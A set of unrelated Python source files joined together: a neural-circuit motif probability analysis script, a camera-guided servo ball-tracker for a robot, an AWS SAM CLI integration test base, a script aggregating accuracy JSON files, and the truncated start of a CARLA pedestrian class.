def parseIntersomaticDistanceDescriptor(descriptor):
if("#" not in descriptor):
raise ValueError(descriptor)
parts = descriptor.split("#")
if(len(parts) != 4):
raise ValueError(descriptor)
populationDescriptor = parts[0]
partsPopulation = populationDescriptor.split("-")
column = partsPopulation[0]
celltypeLayer = partsPopulation[1]
population = (column, celltypeLayer)
distMin = float(parts[1])
distMax = float(parts[2])
distRange = (distMin, distMax)
return population, distRange
def sampleIntersomaticDistanceIds(networkDir, outfolder, combinations, sampleSize, numWorkers):
neurons = util_meta.loadNeuronProps(os.path.join(networkDir, "neurons.csv"))
neuronsLayer = util_meta.loadNeuronsLayer(os.path.join(networkDir, "neurons_layer.csv"))
for combination in combinations:
A = combination[0]
B = combination[1]
C = combination[2]
population_A, distRange_A = parseIntersomaticDistanceDescriptor(A)
population_B, distRange_B = parseIntersomaticDistanceDescriptor(B)
population_C, distRange_C = parseIntersomaticDistanceDescriptor(C)
if(distRange_A != distRange_B or distRange_B != distRange_C):
raise RuntimeError("incompatible distances {}".format(combination))
distRange = distRange_A
nids_A, nids_sampled_A = sampleIdsForPopulation(neurons, neuronsLayer, population_A, sampleSize)
nids_B, nids_sampled_B = sampleIdsForPopulation(neurons, neuronsLayer, population_B, sampleSize)
nids_C, nids_sampled_C = sampleIdsForPopulation(neurons, neuronsLayer, population_C, sampleSize)
numTripletSamples = sampleSize**3
tripletSamples = util_intersomatic_distance.getTripletSamples(neurons, nids_A, nids_B, nids_C, distRange, numTripletSamples, numWorkers, numNeuronSubSamples=sampleSize)
filename = os.path.join(outfolder, "ids_{}_{}_{}.txt".format(A,B,C))
np.savetxt(filename, tripletSamples, fmt="%d", delimiter=",")
def sampleIds(networkDir, outfolder, mode, sampleSize, numWorkers):
if(mode == "celltype-combinations"):
combinations = motif_combinations.getCellTypeCombinations()
elif(mode == "celltype-layer-combinations"):
combinations = motif_combinations.getCellTypeLayerCombinations()
elif(mode == "all-column-combinations"):
combinations = motif_combinations.getAllColumnCombinations()
elif(mode == "selected-column-combinations"):
combinations = motif_combinations.getSelectedColumnCombinations()
elif(mode == "intersomatic-distance-combinations"):
combinations = motif_combinations.getIntersomaticDistanceCombinations()
sampleIntersomaticDistanceIds(networkDir, outfolder, combinations, sampleSize, numWorkers)
else:
raise ValueError(mode)
populations = getPopulationsFromCombinations(combinations, mode)
neurons = util_meta.loadNeuronProps(os.path.join(networkDir, "neurons.csv"))
neuronsLayer = util_meta.loadNeuronsLayer(os.path.join(networkDir, "neurons_layer.csv"))
for population in populations:
nids, nidsSampled = sampleIdsForPopulation(neurons, neuronsLayer, population, sampleSize)
column = population[0]
celltypeLayer = population[1]
filename = os.path.join(outfolder, "ids_{}-{}.txt".format(column, celltypeLayer))
np.savetxt(filename, nids, fmt="%d")
filenameSampled = os.path.join(outfolder, "ids_{}-{}_sampled.txt".format(column, celltypeLayer))
np.savetxt(filenameSampled, nidsSampled, fmt="%d")
def loadIds(idsFolder, descriptor, ignoreIdPostfix):
if("#" in descriptor and ignoreIdPostfix):
descriptor = descriptor.split("#")[0]
nids = np.loadtxt(os.path.join(idsFolder, "ids_{}.txt".format(descriptor)), dtype=int)
nidsSampled = np.loadtxt(os.path.join(idsFolder, "ids_{}_sampled.txt".format(descriptor)), dtype=int)
return nids, nidsSampled
def loadDependentIds(idsFolder, descriptorA, descriptorB, descriptorC):
filename = os.path.join(idsFolder, "ids_{}_{}_{}.txt".format(descriptorA, descriptorB, descriptorC))
nids = np.loadtxt(filename, delimiter=",", dtype=int)
nids_A = nids[:,0]
nids_B = nids[:,1]
nids_C = nids[:,2]
return nids_A, nids_B, nids_C
def loadDSC(networkDir, preIds, dscCache, descriptor, dscFolder):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UserWarning)
if(descriptor in dscCache):
return dscCache[descriptor]
dscFolder = os.path.join(networkDir, dscFolder)
dscPerPre = {}
for preId in preIds:
filename = os.path.join(dscFolder, "{}_DSC.csv".format(preId))
postIds, dscValues = util.loadDataBlock(filename,1)
dscPerPre[preId] = {
"postIds" : postIds,
"dscValues" : dscValues,
}
dscCache[descriptor] = dscPerPre
return dscPerPre
def loadDSCOnlineExperiment(networkDir, preIds, dscCache, dscFolder):
dscFolder = os.path.join(networkDir, dscFolder)
for preId in preIds:
if(preId not in dscCache.keys()):
filename = os.path.join(dscFolder, "{}_DSC.csv".format(preId))
postIds, dscValues = util.loadDataBlock(filename,1)
dscCache[preId] = {
"postIds" : postIds,
"dscValues" : dscValues,
}
def calcProbabilitiesSinglePreNeuron(postIds, dscPerPreNeuron):
dscMatched = np.zeros(postIds.size)
overlappingPostIds = dscPerPreNeuron["postIds"]
dscValues = dscPerPreNeuron["dscValues"]
common, idxOverlapping, idxMatched = np.intersect1d(overlappingPostIds, postIds, assume_unique=True, return_indices=True)
if(common.size):
dscMatched[idxMatched] = dscValues[idxOverlapping]
p = 1-np.exp(-dscMatched)
return p
def calcProbabilties(preIds, postIds, dscPerPre):
probs = np.zeros(shape=(preIds.size, postIds.size))
for i in range(0, preIds.size):
preId = preIds[i]
dscPerPreNeuron = dscPerPre[preId]
probs[i,:] = calcProbabilitiesSinglePreNeuron(postIds, dscPerPreNeuron)
return probs
def getMotifMasks(numNodes):
nEdges = numNodes * (numNodes-1)
if(nEdges > 8):
raise ValueError(nEdges)
edgeConfigurations = np.arange(2**nEdges, dtype=np.uint8).reshape((-1,1))
masks = np.unpackbits(edgeConfigurations, axis=1)
masks_inv = np.ones_like(masks) - masks
masks = masks.astype(bool)
masks_inv = masks_inv.astype(bool)
return masks[:,(8-nEdges):], masks_inv[:,(8-nEdges):]
def calcMotifProbability(p, p_inv, mask, mask_inv):
p_edges = np.concatenate((p[:,mask], p_inv[:,mask_inv]), axis=1)
p_motif = np.prod(p_edges, axis=1)
return np.mean(p_motif)
def calcModelProbabilitiesIndependentSamples(stats, nids_A_sample, nids_B_sample, nids_C_sample, dsc_A, dsc_B, dsc_C):
num_A = nids_A_sample.size
num_B = nids_B_sample.size
num_C = nids_C_sample.size
numSamples = num_A * num_B * num_C
p_model = np.zeros(shape=(numSamples, 6))
p_A_B = calcProbabilties(nids_A_sample, nids_B_sample, dsc_A)
p_B_A = calcProbabilties(nids_B_sample, nids_A_sample, dsc_B)
p_A_C = calcProbabilties(nids_A_sample, nids_C_sample, dsc_A)
p_C_A = calcProbabilties(nids_C_sample, nids_A_sample, dsc_C)
p_B_C = calcProbabilties(nids_B_sample, nids_C_sample, dsc_B)
p_C_B = calcProbabilties(nids_C_sample, nids_B_sample, dsc_C)
p_all = np.concatenate((p_A_B, p_B_A, p_A_C, p_C_A, p_B_C, p_C_B), axis=None)
stats["avg_A-B"] = np.mean(p_A_B)
stats["sd_A-B"] = np.std(p_A_B)
stats["avg_B-A"] = np.mean(p_B_A)
stats["sd_B-A"] = np.std(p_B_A)
stats["avg_A-C"] = np.mean(p_A_C)
stats["sd_A-C"] = np.std(p_A_C)
stats["avg_C-A"] = np.mean(p_C_A)
stats["sd_C-A"] = np.std(p_C_A)
stats["avg_B-C"] = np.mean(p_B_C)
stats["sd_B-C"] = np.std(p_B_C)
stats["avg_C-B"] = np.mean(p_C_B)
stats["sd_C-B"] = np.std(p_C_B)
stats["avg_all"] = np.mean(p_all)
stats["sd_all"] = np.std(p_all)
idx = 0
for i in range(0, num_A):
for j in range(0, num_B):
for k in range(0, num_C):
if(i == j or i == k or j == k):
p_model[idx, :] = 0
else:
p_model[idx, 0] = p_A_B[i,j]
p_model[idx, 1] = p_B_A[j,i]
p_model[idx, 2] = p_A_C[i,k]
p_model[idx, 3] = p_C_A[k,i]
p_model[idx, 4] = p_B_C[j,k]
p_model[idx, 5] = p_C_B[k,j]
idx += 1
return p_model
def calcProbilityAll(nids_A, nids_B, nids_C, p_model):
nids_ABC = np.concatenate((nids_A.reshape(-1,1), nids_B.reshape(-1,1), nids_C.reshape(-1,1)), axis=1)
_, indices_AB = np.unique(nids_ABC[:, (0,1)], return_index = True, axis=1)
_, indices_AC = np.unique(nids_ABC[:, (0,2)], return_index = True, axis=1)
_, indices_BC = np.unique(nids_ABC[:, (1,2)], return_index = True, axis=1)
p_A_B_unique = p_model[indices_AB, 0]
p_B_A_unique = p_model[indices_AB, 1]
p_A_C_unique = p_model[indices_AC, 2]
p_C_A_unique = p_model[indices_AC, 3]
p_B_C_unique = p_model[indices_BC, 4]
p_C_B_unique = p_model[indices_BC, 5]
p_ABC_unique = np.concatenate((p_A_B_unique, p_B_A_unique, p_A_C_unique, p_C_A_unique, p_B_C_unique, p_C_B_unique), axis=None)
return p_ABC_unique
def calcModelProbabilitiesDependentSamples(stats, nids_A, nids_B, nids_C, dsc_ABC):
num_A = nids_A.size
num_B = nids_B.size
num_C = nids_C.size
if(num_A != num_B or num_B != num_C):
raise RuntimeError("dependent sample size mismatch")
numSamples = num_A
p_model = np.zeros(shape=(numSamples, 6))
nids_merged_unique, rev_indices = getMergedUnique(nids_A, nids_B, nids_C)
p_ABC = calcProbabilties(nids_merged_unique, nids_merged_unique, dsc_ABC)
for i in range(0, numSamples):
ia = rev_indices[i]
ib = rev_indices[i + numSamples]
ic = rev_indices[i + 2 * numSamples]
p_model[i, 0] = p_ABC[ia, ib]
p_model[i, 1] = p_ABC[ib, ia]
p_model[i, 2] = p_ABC[ia, ic]
p_model[i, 3] = p_ABC[ic, ia]
p_model[i, 4] = p_ABC[ib, ic]
p_model[i, 5] = p_ABC[ic, ib]
p_all = calcProbilityAll(nids_A, nids_B, nids_C, p_model)
stats["avg_A-B"] = np.mean(p_model[:, 0])
stats["sd_A-B"] = np.std(p_model[:, 0])
stats["avg_B-A"] = np.mean(p_model[:, 1])
stats["sd_B-A"] = np.std(p_model[:, 1])
stats["avg_A-C"] = np.mean(p_model[:, 2])
stats["sd_A-C"] = np.std(p_model[:, 2])
stats["avg_C-A"] = np.mean(p_model[:, 3])
stats["sd_C-A"] = np.std(p_model[:, 3])
stats["avg_B-C"] = np.mean(p_model[:, 4])
stats["sd_B-C"] = np.std(p_model[:, 4])
stats["avg_C-B"] = np.mean(p_model[:, 5])
stats["sd_C-B"] = np.std(p_model[:, 5])
stats["avg_all"] = np.mean(p_all)
stats["sd_all"] = np.std(p_all)
return p_model
def calcMotifProbabilities(stats, nids_A_sample, nids_B_sample, nids_C_sample, dsc_A, dsc_B, dsc_C, independentSamples):
if(independentSamples):
p_model = calcModelProbabilitiesIndependentSamples(stats, nids_A_sample, nids_B_sample, nids_C_sample, dsc_A, dsc_B, dsc_C)
else:
dsc_ABC = dsc_A
p_model = calcModelProbabilitiesDependentSamples(stats, nids_A_sample, nids_B_sample, nids_C_sample, dsc_ABC)
p_model_inv = 1 - p_model
p_avg = np.zeros(6)
p_avg[0] = stats["avg_A-B"]
p_avg[1] = stats["avg_B-A"]
p_avg[2] = stats["avg_A-C"]
p_avg[3] = stats["avg_C-A"]
p_avg[4] = stats["avg_B-C"]
p_avg[5] = stats["avg_C-B"]
p_avg = p_avg.reshape((-1,6))
p_avg_inv = 1 - p_avg
masks, masks_inv = getMotifMasks(3)
stats["motif_probabilities_64_random"] = {}
stats["motif_probabilities_64_model"] = {}
for i in range(0, masks.shape[0]):
mask = masks[i,:]
mask_inv = masks_inv[i,:]
p_motif_random = calcMotifProbability(p_avg, p_avg_inv, mask, mask_inv)
p_motif_model = calcMotifProbability(p_model, p_model_inv, mask, mask_inv)
motifKey = tuple(mask.astype(int))
stats["motif_probabilities_64_random"][motifKey] = p_motif_random
stats["motif_probabilities_64_model"][motifKey] = p_motif_model
def getMergedUnique(nidsA, nidsB, nidsC):
merged = np.concatenate((nidsA, nidsB, nidsC))
mergedUnique, reverseIndices = np.unique(merged, return_inverse=True)
return mergedUnique, reverseIndices
def calcEdgeProbabilitiesBatch(batchIndex, results, combinations, idsFolder, independentSamples, mode, networkDir, outfolder):
k = 0
dscCache = {}
for combination in combinations:
k += 1
if(k % 10 == 0):
dscCache = {}
dscFolder = "DSC_50-50-50_all"
ignoreIdPostfix = False
if("h01" in mode):
ignoreIdPostfix = True
if("#null-model" in combination[0]):
dscFolder = "DSC_null-model"
else:
dscFolder = "DSC_empirical"
if(mode == "online-experiment"):
combinationKey = combination
A = "sel-A"
B = "sel-B"
C = "sel-C"
else:
A = combination[0]
B = combination[1]
C = combination[2]
combinationKey = (A, B, C)
try:
if(independentSamples):
if(mode == "online-experiment"):
nids_A_sample = idsFolder["A"]
nids_B_sample = idsFolder["B"]
nids_C_sample = idsFolder["C"]
loadDSCOnlineExperiment(networkDir, nids_A_sample, dscCache, dscFolder)
loadDSCOnlineExperiment(networkDir, nids_B_sample, dscCache, dscFolder)
loadDSCOnlineExperiment(networkDir, nids_C_sample, dscCache, dscFolder)
dsc_A = dscCache
dsc_B = dscCache
dsc_C = dscCache
else:
_, nids_A_sample = loadIds(idsFolder, A, ignoreIdPostfix)
_, nids_B_sample = loadIds(idsFolder, B, ignoreIdPostfix)
_, nids_C_sample = loadIds(idsFolder, C, ignoreIdPostfix)
dsc_A = loadDSC(networkDir, nids_A_sample, dscCache, A, dscFolder)
dsc_B = loadDSC(networkDir, nids_B_sample, dscCache, B, dscFolder)
dsc_C = loadDSC(networkDir, nids_C_sample, dscCache, C, dscFolder)
else:
nids_A_sample, nids_B_sample, nids_C_sample = loadDependentIds(idsFolder, A, B, C)
nids_merged_unique, _ = getMergedUnique(nids_A_sample, nids_B_sample, nids_C_sample)
print("nids_merged_unique", nids_merged_unique.shape)
dsc_A = loadDSC(networkDir, nids_merged_unique, dscCache, A, dscFolder)
dsc_B = None
dsc_C = None
stats = {}
calcMotifProbabilities(stats, nids_A_sample, nids_B_sample, nids_C_sample, dsc_A, dsc_B, dsc_C, independentSamples)
stats["motif_probabilities_16_random"] = aggregateProbabilties_16(stats["motif_probabilities_64_random"])
stats["motif_probabilities_16_model"] = aggregateProbabilties_16(stats["motif_probabilities_64_model"])
results[combinationKey] = stats
print("batch {}: processed {}/{}".format(batchIndex, k, len(combinations)))
except Exception as e:
results[combinationKey] = None
print(traceback.format_exc())
if(outfolder):
errorFile = os.path.join(outfolder, "error_{}-{}-{}.txt".format(A, B, C))
with open(errorFile, "w+") as f:
f.write(traceback.format_exc())
print("batch {}: failed {}/{}".format(batchIndex, k, len(combinations)))
def writeMotifFeatures(filename, results, combinations):
with open(filename, "w+") as f:
f.write("A,B,C,avg_A-B,sd_A-B,avg_B-A,sd_B-A,avg_A-C,sd_A-C,avg_C-A,sd_C-A,avg_B-C,sd_B-C,avg_B-C,sd_B-C,avg_all,sd_all\n")
for combination in combinations:
stats = results[combination]
if(stats is None):
continue
f.write("{},{},{},".format(combination[0], combination[1], combination[2]))
f.write("{:.12E},{:.12E},".format(stats["avg_A-B"], stats["sd_A-B"]))
f.write("{:.12E},{:.12E},".format(stats["avg_B-A"], stats["sd_B-A"]))
f.write("{:.12E},{:.12E},".format(stats["avg_A-C"], stats["sd_A-C"]))
f.write("{:.12E},{:.12E},".format(stats["avg_C-A"], stats["sd_C-A"]))
f.write("{:.12E},{:.12E},".format(stats["avg_B-C"], stats["sd_B-C"]))
f.write("{:.12E},{:.12E},".format(stats["avg_C-B"], stats["sd_C-B"]))
f.write("{:.12E},{:.12E}\n".format(stats["avg_all"], stats["sd_all"]))
def writeMotifProbabilities(outfolder, results, combinations):
masks, masks_inv = getMotifMasks(3)
for combination in combinations:
if(results[combination] is None):
continue
probabilities_random = results[combination]["motif_probabilities_64_random"]
probabilities_model = results[combination]["motif_probabilities_64_model"]
filename = os.path.join(outfolder,"probabilities_64_{}-{}-{}.csv".format(combination[0], combination[1], combination[2]))
with open(filename, "w+") as f:
f.write("A-B,B-A,A-C,C-A,B-C,C-B,probability_random,probability_model\n")
for i in range(0,masks.shape[0]):
mask = masks[i,:]
motifKey = tuple(mask.astype(int))
p_random = probabilities_random[motifKey]
p_model = probabilities_model[motifKey]
f.write("{},{},{},{},{},{},".format(motifKey[0], motifKey[1], motifKey[2], motifKey[3], motifKey[4], motifKey[5]))
f.write("{:.12E},{:.12E}\n".format(p_random, p_model))
def writeSummary(filename, results, combinations):
with open(filename, "w+") as f:
f.write("A,B,C")
for k in range(1,17):
f.write(",motif-{}_random".format(k))
f.write(",motif-{}_model".format(k))
f.write("\n")
for combination in combinations:
if(results[combination] is None):
continue
f.write("{},{},{}".format(combination[0], combination[1], combination[2]))
probabilities_random = results[combination]["motif_probabilities_16_random"]
probabilities_model = results[combination]["motif_probabilities_16_model"]
for k in range(1,17):
f.write(",{:.12E}".format(probabilities_random[k]))
f.write(",{:.12E}".format(probabilities_model[k]))
f.write("\n")
def calcDeviation(p_random, p_model, maxDeviation = 1000000000000):
if(p_random > 0):
deviation = p_model / p_random
return min(deviation, maxDeviation)
elif(p_model == 0):
return 1
else:
return maxDeviation
def convertSummaryFileJson(filename):
if(".csv" not in filename):
raise ValueError(filename)
outfile = filename.replace(".csv", ".json")
summary = []
with open(filename) as f:
lines = f.readlines()
for i in range(1, len(lines)):
parts = lines[i].rstrip().split(",")
selection = "_".join([parts[0], parts[1], parts[2]])
for k in range(0,16):
p_random = float(parts[k * 2 + 3])
p_model = float(parts[k * 2 + 4])
deviation = calcDeviation(p_random, p_model)
summary.append({
"selection" : selection,
"motif-number" : k + 1,
"prob-random" : round(p_random,8),
"prob-model" : round(p_model,8),
"prob-deviation" : round(deviation,8)
})
with open(outfile, "w+") as f:
json.dump(summary, f)
def getRuleBatchCombinations(networkDir, mode):
dscBaseFolder = os.path.join(networkDir, "DSC_{}".format(mode))
parameterDescriptors = util.getParameterDescriptorsFromFolder(dscBaseFolder)
combinations = []
for parameterDescriptor in parameterDescriptors:
combinations.append((parameterDescriptor, parameterDescriptor, parameterDescriptor))
return combinations
def calcCombinations(networkDir, idsFolder, mode, outfolder, numWorkers):
independentSamples = True
if(mode == "celltype-combinations"):
combinations = motif_combinations.getCellTypeCombinations()
elif(mode == "celltype-layer-combinations"):
combinations = motif_combinations.getCellTypeLayerCombinations()
elif(mode == "all-column-combinations"):
combinations = motif_combinations.getAllColumnCombinations()
elif(mode == "selected-column-combinations"):
combinations = motif_combinations.getSelectedColumnCombinations()
elif(mode == "intersomatic-distance-combinations"):
combinations = motif_combinations.getIntersomaticDistanceCombinations()
independentSamples = False
elif(mode == "h01-layer-combinations"):
combinations = motif_combinations.getH01LayerCombinations()
elif(mode == "h01-pyramidal-combinations"):
combinations = motif_combinations.getH01PyramidalCombinations()
else:
raise ValueError(mode)
batches = np.array_split(combinations, numWorkers)
manager = mp.Manager()
results = manager.dict()
processes = []
for i in range(0, len(batches)):
p = mp.Process(target=calcEdgeProbabilitiesBatch, args=(i, results, batches[i], idsFolder, independentSamples, mode, networkDir, outfolder))
p.start()
processes.append(p)
for p in processes:
p.join()
filename = os.path.join(outfolder, "features_{}.csv".format(mode))
writeMotifFeatures(filename, results, combinations)
writeMotifProbabilities(outfolder, results, combinations)
filename = os.path.join(outfolder, "probabilities_16_{}.csv".format(mode))
writeSummary(filename, results, combinations)
convertSummaryFileJson(filename)
def printUsageAndExit():
print("eval_motifs.py network-dir mode num-workers [sample-ids]")
print()
print("mode: celltype-combinations, celltype-layer-combinations, all-column-combinations, selected-column-cobinations, intersomatic-distance-combinations")
print(" h01-layer-combinations, h01-pyramidal-combinations")
exit()
if __name__ == "__main__":
if(len(sys.argv) not in [4,5]):
printUsageAndExit()
networkDir = sys.argv[1]
mode = sys.argv[2]
numWorkers = int(sys.argv[3])
resampleIds = False
if(len(sys.argv) == 5):
if(sys.argv[4] not in ["sample-ids"]):
printUsageAndExit()
resampleIds = True
util.makeDir(os.path.join(networkDir, "eval", "motifs"))
idsFolder = os.path.join(networkDir, "eval", "motifs", "samples_{}".format(mode))
if(resampleIds):
util.makeCleanDir(idsFolder)
if(mode == "celltype-combinations"):
sampleSize = 200
elif(mode == "celltype-layer-combinations"):
sampleSize = 200
elif(mode == "all-column-combinations"):
sampleSize = 200
elif(mode == "selected-column-combinations"):
sampleSize = 200
elif(mode == "intersomatic-distance-combinations"):
sampleSize = 300
elif("h01" in mode):
raise ValueError(mode)
else:
raise ValueError(mode)
combinationsDir = os.path.join(networkDir, "eval", "motifs", mode)
util.makeCleanDir(combinationsDir)
if(resampleIds):
sampleIds(networkDir, idsFolder, mode, sampleSize, numWorkers)
calcCombinations(networkDir, idsFolder, mode, combinationsDir, numWorkers) |
11.robot_servo_ball.py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
* @par Copyright (C): 2010-2020, Hunan CLB Tech
* @file robot_sevo_ball
* @version V1.0
* @details
* @par History
@author: zhulin
"""
from __future__ import division
import cv2
import time
import numpy as np
from LOBOROBOT import LOBOROBOT,PCA9685 # 载入机器人库
import threading
import sys
reload(sys)
sys.setdefaultencoding('utf8')
# 实例化机器人对象
clbrobot = PCA9685(0x40, debug=False) # 实例化机器人对象
clbrobot.setPWMFreq(50)
# 设置舵机初始值,可以根据自己的要求调试
clbrobot.setPWM(10,0,350) # 底座舵机
clbrobot.setPWM(9,0,370) # 倾斜舵机
time.sleep(1)
#初始化摄像头并设置阙值
usb_cap = cv2.VideoCapture(0)
# 设置球体追踪的HSV值,上下限值
ball_yellow_lower=np.array([9,135,231])
ball_yellow_upper=np.array([31,255,255])
# 设置显示的分辨率,设置为320×240 px
usb_cap.set(3, 320)
usb_cap.set(4, 240)
#舵机云台的每个自由度需要4个变量
pid_thisError_x=500 #当前误差值
pid_lastError_x=100 #上一次误差值
pid_thisError_y=500
pid_lastError_y=100
pid_x=0
pid_y=0
# 舵机的转动角度
pid_Y_P = 280
pid_X_P = 300 #转动角度
pid_flag=0
# 机器人舵机旋转
def Robot_servo(X_P,Y_P):
clbrobot.setPWM(10,0,650-pid_X_P)
clbrobot.setPWM(9,0,650-pid_Y_P)
# 循环函数
while True:
ret,frame = usb_cap.read()
#高斯模糊处理
frame=cv2.GaussianBlur(frame,(5,5),0)
hsv= cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)
#ROI及找到形态学找到小球进行处理
mask=cv2.inRange(hsv,ball_yellow_lower,ball_yellow_upper) # 掩膜处理
mask=cv2.erode(mask,None,iterations=2)
mask=cv2.dilate(mask,None,iterations=2)
mask=cv2.GaussianBlur(mask,(3,3),0)
res=cv2.bitwise_and(frame,frame,mask=mask)
cnts=cv2.findContours(mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2] #发现小球
#当找到小球处理
if len(cnts)>0:
cap_cnt=max(cnts,key=cv2.contourArea)
(pid_x,pid_y),radius=cv2.minEnclosingCircle(cap_cnt)
cv2.circle(frame,(int(pid_x),int(pid_y)),int(radius),(255,0,255),2)
# 误差值处理
pid_thisError_x=pid_x-160
pid_thisError_y=pid_y-120
#PID控制参数
pwm_x = pid_thisError_x*3+1*(pid_thisError_x-pid_lastError_x)
pwm_y = pid_thisError_y*3+1*(pid_thisError_y-pid_lastError_y)
#迭代误差值操作
pid_lastError_x = pid_thisError_x
pid_lastError_y = pid_thisError_y
pid_XP=pwm_x/100
pid_YP=pwm_y/100
# pid_X_P pid_Y_P 为最终PID值
pid_X_P=pid_X_P-int(pid_XP)
pid_Y_P=pid_Y_P-int(pid_YP)
#限值舵机在一定的范围之内
if pid_X_P>670:
pid_X_P=650
if pid_X_P<0:
pid_X_P=0
if pid_Y_P>650:
pid_Y_P=650
if pid_X_P<0:
pid_Y_p=0
servo_tid=threading.Thread(target=Robot_servo,args=(pid_X_P,pid_Y_P)) # 多线程
servo_tid.setDaemon(True)
servo_tid.start() # 开启线程
cv2.imshow("MAKEROBO Robot", frame) # 显示图像
if cv2.waitKey(1)==119:
break
usb_cap.release()
cv2.destroyAllWindows()
|
start_api_integ_base.py | import shutil
import uuid
from typing import List, Optional, Dict
from unittest import TestCase, skipIf
import threading
from subprocess import Popen, PIPE
import time
import os
import random
from pathlib import Path
import docker
from tests.testing_utils import SKIP_DOCKER_MESSAGE, SKIP_DOCKER_TESTS, run_command
@skipIf(SKIP_DOCKER_TESTS, SKIP_DOCKER_MESSAGE)
class StartApiIntegBaseClass(TestCase):
template: Optional[str] = None
container_mode: Optional[str] = None
parameter_overrides: Optional[Dict[str, str]] = None
binary_data_file: Optional[str] = None
integration_dir = str(Path(__file__).resolve().parents[2])
invoke_image: Optional[List] = None
build_before_invoke = False
build_overrides: Optional[Dict[str, str]] = None
@classmethod
def setUpClass(cls):
# This is the directory for tests/integration which will be used to file the testdata
# files for integ tests
cls.template = cls.integration_dir + cls.template_path
if cls.binary_data_file:
cls.binary_data_file = os.path.join(cls.integration_dir, cls.binary_data_file)
if cls.build_before_invoke:
cls.build()
cls.port = str(StartApiIntegBaseClass.random_port())
cls.docker_client = docker.from_env()
for container in cls.docker_client.api.containers():
cls.docker_client.api.remove_container(container, force=True)
cls.thread = threading.Thread(target=cls.start_api())
cls.thread.setDaemon(True)
cls.thread.start()
@classmethod
def build(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
command_list = [command, "build"]
if cls.build_overrides:
overrides_arg = " ".join(
["ParameterKey={},ParameterValue={}".format(key, value) for key, value in cls.build_overrides.items()]
)
command_list += ["--parameter-overrides", overrides_arg]
working_dir = str(Path(cls.template).resolve().parents[0])
run_command(command_list, cwd=working_dir)
@classmethod
def start_api(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
command_list = [command, "local", "start-api", "-t", cls.template, "-p", cls.port]
if cls.container_mode:
command_list += ["--warm-containers", cls.container_mode]
if cls.parameter_overrides:
command_list += ["--parameter-overrides", cls._make_parameter_override_arg(cls.parameter_overrides)]
if cls.invoke_image:
for image in cls.invoke_image:
command_list += ["--invoke-image", image]
cls.start_api_process = Popen(command_list, stderr=PIPE)
while True:
line = cls.start_api_process.stderr.readline()
if "(Press CTRL+C to quit)" in str(line):
break
cls.stop_reading_thread = False
def read_sub_process_stderr():
while not cls.stop_reading_thread:
cls.start_api_process.stderr.readline()
cls.read_threading = threading.Thread(target=read_sub_process_stderr)
cls.read_threading.start()
@classmethod
def _make_parameter_override_arg(self, overrides):
return " ".join(["ParameterKey={},ParameterValue={}".format(key, value) for key, value in overrides.items()])
@classmethod
def tearDownClass(cls):
# After all the tests run, we need to kill the start-api process.
cls.start_api_process.kill()
cls.stop_reading_thread = True
@staticmethod
def random_port():
return random.randint(30000, 40000)
@staticmethod
def get_binary_data(filename):
if not filename:
return None
with open(filename, "rb") as fp:
return fp.read()
class WatchWarmContainersIntegBaseClass(StartApiIntegBaseClass):
temp_path: Optional[str] = None
template_path: Optional[str] = None
code_path: Optional[str] = None
docker_file_path: Optional[str] = None
@classmethod
def setUpClass(cls):
cls.temp_path = str(uuid.uuid4()).replace("-", "")[:10]
working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
if Path(working_dir).resolve().exists():
shutil.rmtree(working_dir)
os.mkdir(working_dir)
os.mkdir(Path(cls.integration_dir).resolve().joinpath(cls.temp_path).joinpath("dir"))
cls.template_path = f"/{cls.temp_path}/template.yaml"
cls.code_path = f"/{cls.temp_path}/main.py"
cls.code_path2 = f"/{cls.temp_path}/dir/main2.py"
cls.docker_file_path = f"/{cls.temp_path}/Dockerfile"
cls.docker_file_path2 = f"/{cls.temp_path}/Dockerfile2"
if cls.template_content:
cls._write_file_content(cls.template_path, cls.template_content)
if cls.code_content:
cls._write_file_content(cls.code_path, cls.code_content)
if cls.docker_file_content:
cls._write_file_content(cls.docker_file_path, cls.docker_file_content)
super().setUpClass()
@classmethod
def _write_file_content(cls, path, content):
with open(cls.integration_dir + path, "w") as f:
f.write(content)
@classmethod
def tearDownClass(cls):
working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
if Path(working_dir).resolve().exists():
shutil.rmtree(working_dir)
super().tearDownClass()
|
aggregate_accuracy.py | #!/usr/bin/env python
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Report all 'stats/accuracy.json' into a json file on stdout.
All the accuracies are summarized.
"""
import json
import sys
import threading
import tensorflow as tf
import tqdm
from absl import app
from absl import flags
FLAGS = flags.FLAGS
N_THREADS = 100
def add_contents_to_dict(filename: str, target):
with tf.gfile.Open(filename, 'r') as f:
target[filename] = json.load(f)
def main(argv):
files = []
for path in argv[1:]:
files.extend(tf.io.gfile.glob(path))
assert files, 'No files found'
print('Found %d files.' % len(files), file=sys.stderr)
summary = {}
threads = []
for x in tqdm.tqdm(files, leave=False, desc='Collating'):
t = threading.Thread(
target=add_contents_to_dict, kwargs=dict(filename=x, target=summary))
threads.append(t)
t.start()
while len(threads) >= N_THREADS:
dead = [p for p, t in enumerate(threads) if not t.is_alive()]
while dead:
p = dead.pop()
del threads[p]
if x == files[-1]:
for t in threads:
t.join()
assert len(summary) == len(files)
print(json.dumps(summary, sort_keys=True, indent=4))
if __name__ == '__main__':
app.run(main)
|
walker.py | #!/usr/bin/env python
#
# Copyright (c) 2018-2019 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Classes to handle Carla pedestrians
"""
#import rospy
from derived_object_msgs.msg import Object
import threading
from threading import Thread, Lock, Event
from traffic_participant import TrafficParticipant
from carla_msgs.msg import CarlaWalkerControl
from carla import WalkerControl
from icvSubscriber import Subscriber
class Walker(TrafficParticipant):
"""
Actor implementation details for pedestrians
"""
def __init__(self, carla_actor, parent, communication, prefix=None):
"""
Constructor
